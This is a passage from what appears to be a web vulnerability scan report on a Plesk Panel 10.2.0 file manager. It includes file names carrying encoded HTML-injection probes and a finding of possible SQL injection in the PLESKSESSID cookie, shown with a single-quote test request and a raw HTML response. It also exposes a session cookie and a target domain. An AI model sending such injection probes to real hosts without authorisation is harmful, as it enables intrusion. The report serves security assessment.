&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" 
onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG 
src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return 
false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/edit/ [PLESKSESSID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/edit/

Issue detail

The PLESKSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PLESKSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /plesk/client@2/domain@1/hosting/file-manager/edit/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a'; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:51 GMT
Connection: close
Content-Length: 93683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
                f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
                f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/";
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
                f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/";
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"File manager","href":"\/plesk\/client@2\/domain@1\/hosting\/file-manager\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/edit/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
